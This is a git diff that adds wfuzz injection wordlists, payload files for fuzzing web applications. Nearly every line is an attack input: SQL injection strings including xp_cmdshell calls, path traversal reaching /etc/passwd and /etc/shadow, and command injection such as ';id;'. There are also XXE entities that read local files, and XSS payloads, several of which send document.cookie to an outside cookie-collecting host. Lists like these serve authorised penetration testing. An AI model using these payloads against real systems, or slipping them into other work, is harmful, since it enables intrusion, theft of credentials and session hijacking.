diff options
Diffstat (limited to 'wordlists/wfuzz/Injections')
| -rw-r--r-- | wordlists/wfuzz/Injections/All_attack.txt | 468 | ||||
| -rw-r--r-- | wordlists/wfuzz/Injections/SQL.txt | 125 | ||||
| -rw-r--r-- | wordlists/wfuzz/Injections/Traversal.txt | 68 | ||||
| -rw-r--r-- | wordlists/wfuzz/Injections/XML.txt | 15 | ||||
| -rw-r--r-- | wordlists/wfuzz/Injections/XSS.txt | 39 | ||||
| -rw-r--r-- | wordlists/wfuzz/Injections/bad_chars.txt | 23 |
6 files changed, 738 insertions, 0 deletions
diff --git a/wordlists/wfuzz/Injections/All_attack.txt b/wordlists/wfuzz/Injections/All_attack.txt new file mode 100644 index 0000000..fe94520 --- /dev/null +++ b/wordlists/wfuzz/Injections/All_attack.txt @@ -0,0 +1,468 @@ +A +TRUE +FALSE +0 +00 +1 +-1 +1.0 +-1.0 +2 +-2 +-20 +65536 +268435455 +-268435455 +2147483647 +0xfffffff +NULL +null +\0 +\00 +< script > < / script> +%0a +%00 ++%00 +\0 +\0\0 +\0\0\0 +\00 +\00\00 +\00\00\00 +$null +$NULL +`id` +`dir` +;id; +;read; +;netstat -a; +\nnetstat -a%\n +\"blah +|id| +";id" +id%00 +id%00| +|id +|dir +|dir| +|ls +|ls -la +;ls -la +;dir +|/bin/ls -al +\n/bin/ls -al\n +?x= +?x=" +?x=| +?x=> +/index.html|id| +/boot.ini +/etc/passwd +/etc/shadow +ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| +../../../../../../../../../../../../etc/hosts%00 +../../../../../../../../../../../../etc/hosts +../../boot.ini +/../../../../../../../../%2A +../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../etc/shadow%00 +../../../../../../../../../../../../etc/shadow +/../../../../../../../../../../etc/passwd^^ +/../../../../../../../../../../etc/shadow^^ +/../../../../../../../../../../etc/passwd +/../../../../../../../../../../etc/shadow +/./././././././././././etc/passwd +/./././././././././././etc/shadow +\..\..\..\..\..\..\..\..\..\..\etc\passwd +\..\..\..\..\..\..\..\..\..\..\etc\shadow +..\..\..\..\..\..\..\..\..\..\etc\passwd +..\..\..\..\..\..\..\..\..\..\etc\shadow +/..\../..\../..\../..\../..\../..\../etc/passwd +/..\../..\../..\../..\../..\../..\../etc/shadow +.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd +.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow +\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +%0a/bin/cat%20/etc/passwd +%0a/bin/cat%20/etc/shadow +%00/etc/passwd%00 +%00/etc/shadow%00 +%00../../../../../../etc/passwd +%00../../../../../../etc/shadow +/../../../../../../../../../../../etc/passwd%00.jpg +/../../../../../../../../../../../etc/passwd%00.html +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini +\\'/bin/cat%20/etc/passwd\\' +\\'/bin/cat%20/etc/shadow\\' +../../../../../../../../conf/server.xml +/../../../../../../../../bin/id| +C:/inetpub/wwwroot/global.asa +C:\inetpub\wwwroot\global.asa +C:/boot.ini +C:\boot.ini +../../../../../../../../../../../../localstart.asp%00 +../../../../../../../../../../../../localstart.asp +../../../../../../../../../../../../boot.ini%00 +../../../../../../../../../../../../boot.ini +/./././././././././././boot.ini +/../../../../../../../../../../../boot.ini%00 +/../../../../../../../../../../../boot.ini +/..\../..\../..\../..\../..\../..\../boot.ini +/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini +\..\..\..\..\..\..\..\..\..\..\boot.ini +..\..\..\..\..\..\..\..\..\..\boot.ini%00 +..\..\..\..\..\..\..\..\..\..\boot.ini +/../../../../../../../../../../../boot.ini%00.html +/../../../../../../../../../../../boot.ini%00.jpg +/.../.../.../.../.../ +..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini +%0d%0aX-Injection-Header:%20AttackValue +!@#0%^#0##018387@#0^^**(() +%01%02%03%04%0a%0d%0aADSF +/,%ENV,/ +<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> +<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> +% +# +* +} +; +/ +\ +\\ +\\/ +\\\\* +\\\\?\\ +< +< +< +< +< +<< +<<< +| +|| +` +- +-- +*| +^' +\' +/' +@' +(') +{'} +['] +*' +#' +!' +!@#$%%^#$%#$@#$%$$@#$%^^**(() +%01%02%03%04%0a%0d%0aADSF +\t +"\t" + + + + +#xD +#xA +#xD#xA +#xA#xD +/%00/ +%00/ +%00 +<? +%3C +%3C%3F +%60 +%5C +%5C/ +%7C +%00 +/%2A +%2A +%2C +%20 +%20| +%250a +%2500 +../ +%2e%2e%2f +..%u2215 +..%c0%af +..%bg%qf +..\ +..%5c +..%%35c +..%255c +..%%35%63 +..%25%35%63 +..%u2216 +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +\x3c +\x3C +\u003c +\u003C +something%00html +' +/' +\' +^' +@' +{'} +['] +*' +#' +">xxx<P>yyy +"><script>" +<script>alert("XSS")</script> +<<script>alert("XSS");//<</script> +<script>alert(document.cookie)</script> +'><script>alert(document.cookie)</script> +'><script>alert(document.cookie);</script> +\";alert('XSS');// +%3cscript%3ealert("XSS");%3c/script%3e +%3cscript%3ealert(document.cookie);%3c%2fscript%3e +%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E +<script>alert(document.cookie);</script> +<script>alert(document.cookie);<script>alert +<xss><script>alert('XSS')</script></vulnerable> +<IMG%20SRC='javascript:alert(document.cookie)'> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS')" +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("'XSS'")`> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG%20SRC='javasc ript:alert(document.cookie)'> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav	ascript:alert('XSS');"> +<IMG SRC="jav
ascript:alert('XSS');"> +<IMG SRC="jav
ascript:alert('XSS');"> +<IMG SRC="  javascript:alert('XSS');"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E +"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script> +%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} +'';!--"<XSS>=&{()} + +' +" +# +- +-- +' -- +--'; +' ; += ' += ; += -- +\x23 +\x27 +\x3D \x3B' +\x3D \x27 +\x27\x4F\x52 SELECT * +\x27\x6F\x72 SELECT * +'or select * +admin'-- +<>"'%;)(&+ +' or ''=' +' or 'x'='x +" or "x"="x +') or ('x'='x +0 or 1=1 +' or 0=0 -- +" or 0=0 -- +or 0=0 -- +' or 0=0 # +" or 0=0 # +or 0=0 # +' or 1=1-- +" or 1=1-- +' or '1'='1'-- +"' or 1 --'" +or 1=1-- +or%201=1 +or%201=1 -- +' or 1=1 or ''=' +" or 1=1 or ""=" +' or a=a-- +" or "a"="a +') or ('a'='a +") or ("a"="a +hi" or "a"="a +hi" or 1=1 -- +hi' or 1=1 -- +hi' or 'a'='a +hi') or ('a'='a +hi") or ("a"="a +'hi' or 'x'='x'; +@variable +,@variable +PRINT +PRINT @@variable +select +insert +as +or +procedure +limit +order by +asc +desc +delete +update +distinct +having +truncate +replace +like +handler +bfilename +' or username like '% +' or uname like '% +' or userid like '% +' or uid like '% +' or user like '% +exec xp +exec sp +'; exec master..xp_cmdshell +'; exec xp_regread +t'exec master..xp_cmdshell 'nslookup www.google.com'-- +--sp_password +\x27UNION SELECT +' UNION SELECT +' UNION ALL SELECT +' or (EXISTS) +' (select top 1 +'||UTL_HTTP.REQUEST +1;SELECT%20* +to_timestamp_tz +tz_offset +<>"'%;)(&+ +'%20or%201=1 +%27%20or%201=1 +%20$(sleep%2050) +%20'sleep%2050' +char%4039%41%2b%40SELECT +'%20OR +'sqlattempt1 +(sqlattempt2) +| +%7C +*| +%2A%7C +*(|(mail=*)) +%2A%28%7C%28mail%3D%2A%29%29 +*(|(objectclass=*)) +%2A%28%7C%28objectclass%3D%2A%29%29 +( +%28 +) +%29 +& +%26 +! +%21 +' or 1=1 or ''=' +' or ''=' +x' or 1=1 or 'x'='y +/ +// +//* +*/* +@* +count(/child::node()) +x' or name()='username' or 'x'='y +<name>','')); phpinfo(); exit;/*</name> +<![CDATA[<script>var n=0;while(true){n++;}</script>]]> +<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> +<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> +<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> +<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> +<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> diff --git a/wordlists/wfuzz/Injections/SQL.txt b/wordlists/wfuzz/Injections/SQL.txt new file mode 100644 index 0000000..5ab2ef9 --- /dev/null +++ b/wordlists/wfuzz/Injections/SQL.txt @@ -0,0 +1,125 @@ +'
+"
+#
+-
+--
+'%20--
+--';
+'%20;
+=%20'
+=%20;
+=%20--
+\x23
+\x27
+\x3D%20\x3B'
+\x3D%20\x27
+\x27\x4F\x52 SELECT *
+\x27\x6F\x72 SELECT *
+'or%20select *
+admin'--
+<>"'%;)(&+
+'%20or%20''='
+'%20or%20'x'='x
+"%20or%20"x"="x
+')%20or%20('x'='x
+0 or 1=1
+' or 0=0 --
+" or 0=0 --
+or 0=0 --
+' or 0=0 #
+" or 0=0 #
+or 0=0 #
+' or 1=1--
+" or 1=1--
+' or '1'='1'--
+"' or 1 --'"
+or 1=1--
+or%201=1
+or%201=1 --
+' or 1=1 or ''='
+" or 1=1 or ""="
+' or a=a--
+" or "a"="a
+') or ('a'='a
+") or ("a"="a
+hi" or "a"="a
+hi" or 1=1 --
+hi' or 1=1 --
+hi' or 'a'='a
+hi') or ('a'='a
+hi") or ("a"="a
+'hi' or 'x'='x';
+@variable
+,@variable
+PRINT
+PRINT @@variable
+select
+insert
+as
+or
+procedure
+limit
+order by
+asc
+desc
+delete
+update
+distinct
+having
+truncate
+replace
+like
+handler
+bfilename
+' or username like '%
+' or uname like '%
+' or userid like '%
+' or uid like '%
+' or user like '%
+exec xp
+exec sp
+'; exec master..xp_cmdshell
+'; exec xp_regread
+t'exec master..xp_cmdshell 'nslookup www.google.com'--
+--sp_password
+\x27UNION SELECT
+' UNION SELECT
+' UNION ALL SELECT
+' or (EXISTS)
+' (select top 1
+'||UTL_HTTP.REQUEST
+1;SELECT%20*
+to_timestamp_tz
+tz_offset
+<>"'%;)(&+
+'%20or%201=1
+%27%20or%201=1
+%20$(sleep%2050)
+%20'sleep%2050'
+char%4039%41%2b%40SELECT
+'%20OR
+'sqlattempt1
+(sqlattempt2)
+|
+%7C
+*|
+%2A%7C
+*(|(mail=*))
+%2A%28%7C%28mail%3D%2A%29%29
+*(|(objectclass=*))
+%2A%28%7C%28objectclass%3D%2A%29%29
+(
+%28
+)
+%29
+&
+%26
+!
+%21
+' or 1=1 or ''='
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
diff --git a/wordlists/wfuzz/Injections/Traversal.txt b/wordlists/wfuzz/Injections/Traversal.txt new file mode 100644 index 0000000..161ee87 --- /dev/null +++ b/wordlists/wfuzz/Injections/Traversal.txt @@ -0,0 +1,68 @@ +../../../../../../../../../../../../etc/hosts%00
+../../../../../../../../../../../../etc/hosts
+../../boot.ini
+/../../../../../../../../%2A
+../../../../../../../../../../../../etc/passwd%00
+../../../../../../../../../../../../etc/passwd
+../../../../../../../../../../../../etc/shadow%00
+../../../../../../../../../../../../etc/shadow
+/../../../../../../../../../../etc/passwd^^
+/../../../../../../../../../../etc/shadow^^
+/../../../../../../../../../../etc/passwd
+/../../../../../../../../../../etc/shadow
+/./././././././././././etc/passwd
+/./././././././././././etc/shadow
+\..\..\..\..\..\..\..\..\..\..\etc\passwd
+\..\..\..\..\..\..\..\..\..\..\etc\shadow
+..\..\..\..\..\..\..\..\..\..\etc\passwd
+..\..\..\..\..\..\..\..\..\..\etc\shadow
+/..\../..\../..\../..\../..\../..\../etc/passwd
+/..\../..\../..\../..\../..\../..\../etc/shadow
+.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
+.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
+\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
+\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
+..\..\..\..\..\..\..\..\..\..\etc\passwd%00
+..\..\..\..\..\..\..\..\..\..\etc\shadow%00
+%0a/bin/cat%20/etc/passwd
+%0a/bin/cat%20/etc/shadow
+%00/etc/passwd%00
+%00/etc/shadow%00
+%00../../../../../../etc/passwd
+%00../../../../../../etc/shadow
+/../../../../../../../../../../../etc/passwd%00.jpg
+/../../../../../../../../../../../etc/passwd%00.html
+/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
+/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
+/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
+%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
+/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
+\\'/bin/cat%20/etc/passwd\\'
+\\'/bin/cat%20/etc/shadow\\'
+../../../../../../../../conf/server.xml
+/../../../../../../../../bin/id|
+C:/inetpub/wwwroot/global.asa
+C:\inetpub\wwwroot\global.asa
+C:/boot.ini
+C:\boot.ini
+../../../../../../../../../../../../localstart.asp%00
+../../../../../../../../../../../../localstart.asp
+../../../../../../../../../../../../boot.ini%00
+../../../../../../../../../../../../boot.ini
+/./././././././././././boot.ini
+/../../../../../../../../../../../boot.ini%00
+/../../../../../../../../../../../boot.ini
+/..\../..\../..\../..\../..\../..\../boot.ini
+/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
+\..\..\..\..\..\..\..\..\..\..\boot.ini
+..\..\..\..\..\..\..\..\..\..\boot.ini%00
+..\..\..\..\..\..\..\..\..\..\boot.ini
+/../../../../../../../../../../../boot.ini%00.html
+/../../../../../../../../../../../boot.ini%00.jpg
+/.../.../.../.../.../
+..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
\ No newline at end of file diff --git a/wordlists/wfuzz/Injections/XML.txt b/wordlists/wfuzz/Injections/XML.txt new file mode 100644 index 0000000..ff6e50b --- /dev/null +++ b/wordlists/wfuzz/Injections/XML.txt @@ -0,0 +1,15 @@ +count(/child::node())
+x' or name()='username' or 'x'='y
+<name>','')); phpinfo(); exit;/*</name>
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
+<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
diff --git a/wordlists/wfuzz/Injections/XSS.txt b/wordlists/wfuzz/Injections/XSS.txt new file mode 100644 index 0000000..e0bb5c3 --- /dev/null +++ b/wordlists/wfuzz/Injections/XSS.txt @@ -0,0 +1,39 @@ +"><script>"
+<script>alert("WXSS")</script>
+<<script>alert("WXSS");//<</script>
+<script>alert(document.cookie)</script>
+'><script>alert(document.cookie)</script>
+'><script>alert(document.cookie);</script>
+\";alert('XSS');//
+%3cscript%3ealert("WXSS");%3c/script%3e
+%3cscript%3ealert(document.cookie);%3c%2fscript%3e
+%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
+<script>alert(document.cookie);</script>
+<script>alert(document.cookie);<script>alert
+<xss><script>alert('WXSS')</script></vulnerable>
+<IMG%20SRC='javascript:alert(document.cookie)'>
+<IMG%20SRC="javascript:alert('WXSS');">
+<IMG%20SRC="javascript:alert('WXSS')"
+<IMG%20SRC=javascript:alert('WXSS')>
+<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
+<IMG%20SRC=javascript:alert("WXSS")>
+<IMG%20SRC=`javascript:alert("'WXSS'")`>
+<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">
+<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
+<IMG%20SRC='javasc ript:alert(document.cookie)'>
+<IMG%20SRC="jav ascript:alert('WXSS');">
+<IMG%20SRC="jav	ascript:alert('WXSS');">
+<IMG%20SRC="jav
ascript:alert('WXSS');">
+<IMG%20SRC="jav
ascript:alert('WXSS');">
+<IMG%20SRC="%20%20javascript:alert('WXSS');">
+<IMG%20DYNSRC="javascript:alert('WXSS')">
+<IMG%20LOWSRC="javascript:alert('WXSS')">
+<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
+<IMG%20SRC=javascript:alert('XSS')>
+<IMG%20SRC=javascript:alert('XSS')>
+<IMG%20SRC=javascript:alert('XSS')>
+'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
+"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
+%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
+'';!--"<XSS>=&{()}
diff --git a/wordlists/wfuzz/Injections/bad_chars.txt b/wordlists/wfuzz/Injections/bad_chars.txt new file mode 100644 index 0000000..0fe2bbf --- /dev/null +++ b/wordlists/wfuzz/Injections/bad_chars.txt @@ -0,0 +1,23 @@ +! +" +% +%0a +%0d +%7f +%ff +%n +%s +%x +& +' +* ++ +, +- +-1 +; +< += +> +_ +¦ |